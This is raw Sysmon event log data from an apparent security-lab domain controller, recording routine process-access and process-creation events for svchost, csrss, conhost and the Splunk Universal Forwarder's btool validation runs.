10341000x80000000000000008320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:56.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F0-6064-EE00-00000000AE01}5436C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-64F0-6064-ED00-00000000AE01}67766780C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64F0-6064-EE00-00000000AE01}5436C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-64F0-6064-EE00-00000000AE01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64F0-6064-ED00-00000000AE01}6776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000008314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.330{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F0-6064-ED00-00000000AE01}6776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:56.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:56.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.330{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F0-6064-ED00-00000000AE01}6776C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.330{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64F0-6064-ED00-00000000AE01}6776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.339{266CAFBE-64F0-6064-ED00-00000000AE01}6776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" 
_internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.284{266CAFBE-64F0-6064-EC00-00000000AE01}67886784C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.034{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F0-6064-EC00-00000000AE01}6788C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:56.034{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.034{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:56.034{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.034{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F0-6064-EC00-00000000AE01}6788C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:56.034{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.034{266CAFBE-64F0-6064-EB00-00000000AE01}65166508C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64F0-6064-EC00-00000000AE01}6788C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.037{266CAFBE-64F0-6064-EC00-00000000AE01}6788C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64F0-6064-EB00-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000008297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.018{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F0-6064-EB00-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:56.018{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.018{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:56.018{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.018{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.018{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F0-6064-EB00-00000000AE01}6516C:\Program 
